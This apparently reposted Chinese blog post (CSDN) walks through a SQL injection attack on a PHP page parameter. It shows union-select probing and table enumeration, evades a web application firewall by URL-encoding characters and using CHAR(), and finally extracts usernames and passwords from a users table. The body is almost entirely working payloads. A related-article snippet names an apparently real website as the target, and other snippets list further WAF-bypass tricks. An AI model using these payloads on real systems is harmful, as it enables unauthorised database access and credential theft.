WAF绕过方法之URL编码

最新推荐文章于 2024-06-03 20:04:33 发布
最新推荐文章于 2024-06-03 20:04:33 发布
阅读量719 收藏 1
点赞数 1
文章标签: php 数据库
原文链接:http://www.cnblogs.com/sxmcACM/p/4068404.html
版权

(1)SQL注入点
contents.php?id=3
(2)字段数
contents.php?id=3 order by 4
(3)显示位数4
contents.php?id=3 union select 1,2,3,4
正常
(4)爆出用户名,数据库,版本号
contents.php?id=3 UNION select 1,2,3,contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
出现问题
(5)爆表
contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
尝试绕过不成功
contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
(6)使用URL编码成功绕过(t经过URL编码后为%74)
contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
(7)爆字段
contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

其中
CONCAT_WS(CHAR(32,58,32),user(),database(),version())    表示爆出用户名,数据库,版本号
CHAR(117, 115, 101, 114, 115)    表示users
0x3a    表示冒号 :
group_concat  用法参考点这

参考:点这

转载于:https://www.cnblogs.com/sxmcACM/p/4068404.html

asdfghjkl978564
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
44-5 waf绕过 - SQL注入绕WAF方法
weixin_43263566的博客
06-04 109
内联注释是一种特殊的注释格式,在其后面紧跟着数据库版本号时,如果实际的数据库版本等于或高于该字符串,则应用程序会将注释内容解释为SQL语句,否则将其视为注释处理。默认情况下,如果没有指定版本号,内联注释中的内容将会执行。首先经过测试发现安全狗并不是直接过滤 and 关键字,而是过滤 adn + 一个表达式,如:and 1=1 这种才会被过滤。如果你要使用order by进行爆列,会发现也被过滤了,绕过:使用 group by 绕过。/ 之后的注释内容则会被真正地注释掉,失去作用。
php 编码绕过,WAF绕过方法URL编码 | CN-SEC 中文网
weixin_30995661的博客
04-01 326
实例讲解如何利用URL编码绕过WAF防护SQL注入点http://www.magrabiyemen.com/contents.php?id=3字段数为4http://www.magrabiyemen.com/contents.php?id=3 order by 4显示位为4http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,...
urlcode编码绕过xss限制
weixin_42902697的博客
11-10 729
urlcode编码绕过xss限制
46、47-绕过WAF(Web应用程序防火墙)--介绍、主要功能、部署模式、分类及注入绕过方式等
最新发布
XLbb的博客
06-03 1593
网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全;IP黑白名单功能允许用户设置个性化的IP信任列表,直接屏蔽或者允许指定IP访问网站。同时,增加iP临时黑名单功能,以及实现了针对某个功能的iP白名单功能。同时,爬虫白名单提供爬虫信任机制,在出现误拦截情况下,允许用户自定义爬虫信任。
Web常用编码以及攻击绕过笔记
gc_msc的博客
07-25 5336
一、URL编码 形式:“%”加上ASCII码(先将字符转换为两位ASCII码,再转为16进制),其中加号“+”在URL编码中和“%20”表示一样,均为空格。 当遇到非ASCII码表示的字符时,如中文,浏览器或通过编写URLEncode,根据UTF-8、GBK等编码16进制形式,进行转换。如“春”的UTF-8编码为E6 98 A5,因此其在支持UTF-8的情况下,URL编码为%E6%98%A5。
URL编码绕过WAF
技术超强的网络安全平台
11-21 2155
URL编码绕过WAF 符号\进行url编码一次是%5c。 但攻击者怕这个会被认出来,所以用二次编码,把%本身编码成%25。再和后边拼成%255c。 如果URL解码器有缺陷,只不断重复“从前边开始解析”这个步骤,就会把这个先变回%5c,再变成/,出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。 抵抗父级目录回溯攻击,绝对不能依赖字符过滤,你过滤不完的。必须用“鸭子编程法”,先不论如何构造完整路径,再检验是否在有权的操作目录下。 要正确进行URL解码,谨记使用PHP等语言提供的内部函数,切勿重复发
浏览器编码绕过
superprintf的博客
03-29 509
原文请看 编码与解码,浏览器都做了什么 更好的理解原文还需要观看: 1.url编码与解码原理 摘抄一些: RFC3986文档规定,Url中只允许包含英文字母(a-zA-Z)、数字(0-9)、-_.~4个特殊字符以及所有保留字符,如果想在url中输入除了以上的字符就需要URL编码 RFC3986中指定了以下字符为保留字符:! * ' ( ) ; : @ & = + $ , / ? # [ ] 只有普通英文字符和数字,特殊字符$-_.+!*'()还有保留字符,才能出现在未经编码Url之中 但是数据中包
waf绕过方法总结
gugonggugong的博客
12-30 2890
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3791
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
那些年我们绕过WAF
05-07
描述中提到,本文总结了WAF绕过方法,旨在帮助测试人员在进行安全性测试时,能够有效地绕过WAF的限制。 以下是一些具体的绕过WAF的策略和技术: 1. **编码转换**: - **URL编码**:攻击者可以使用URL编码来隐藏...
渗透测试-WAF绕过通用思路
cdyunaq的博客
03-14 3008
概述:通用的方法,不仅限于 SQL 注入,就是万金油,无非就是大小写、双写、编码、注释、垃圾字符、分块传输、HPP、WAF 特性等 核心:所有能改的地方,都捣鼓捣鼓改改,增加就加,能删就删,多拿点其他内容来混淆视听。 大小写 unIoNSelect 双写 一些后端可能会直接给关键词过滤为空,那么就可以利用双写来绕过 ununionion==>去掉union==>union 编码 URL 编码 Unicode 编码 十六进制编码 ...
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3982
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
URL编码与解码
尹自强.DoSomething()
03-11 984
通常如果一样东西需要编码,说明这样东西并不适合传输。原因多种多样,如Size过大,包含隐私数据,对于Url来说,之所以要进行编码,是因为Url中有些字符会引起歧义。   例如,Url参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/s?q=abc&ie=utf-8。如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引
WAF介绍及常见绕过方法
qq_41320827的博客
02-20 8749
一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 1.工作原理 对web应用程序客户端发出的流量进行内容检测和验证,检测其安全性与合法性,来屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。 2.WAF分类 软件型WAF 以软件形式装在所保护的服务器...
WAF绕过通用思路
Askshhbs的博客
04-26 928
概述 通用的方法,不仅限于SQL注入,就是万金油,无非就是大小写、双写、编码、注释、垃圾字符、分块传输、HPP、WAF特性等 核心:所有能改的地方,都捣鼓捣鼓改改,增加就加,能删就删,多拿点其他内容来混淆视听。 大小写 unIoNSelect 双写 一些后端可能会直接给关键词过滤为空,那么就可以利用双写来绕过 ununionion ==> 去掉union ==> union 编码 URL编码 Unicode编码 十六进制编码 其他后端会解析的编码 注释 如mysql
什么是URL/URL编码绕过
好好睡觉
11-07 2082
URLURL绕过
WAF绕过小技巧
tomyyyyy
09-22 6790
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
搭建漏洞环境及实操
zzzzzzcq的博客
04-07 390
什么是WAF? WEB应用防火墙 (Web Application Firewall) 定义:通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。 WAF绕过方法 1. 大小写混合 在规则匹配时只针对了特定大写或特定小写的情况,在实战中可以通过混合大小写的方式进行绕过(现在几乎没有这样的情况),如下所示。 uNion sElEct 1,2,3,4,5 2.URL编码 极少部分的 WAF 不会对普通字符进行 URL 解码,如下所示。union select 1,2,3,4,...
WAF绕过技术:冷门函数与策略规避详解
在具体编码绕过示例中,列举了URL编码、Unicode编码和针对discuzX的特殊绕过方法。例如,通过Unicode编码可以将`union`关键字转换为 `%u006e` 和 `%u0069` 的组合,从而躲避WAF的关键词检测。此外,还提到了在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值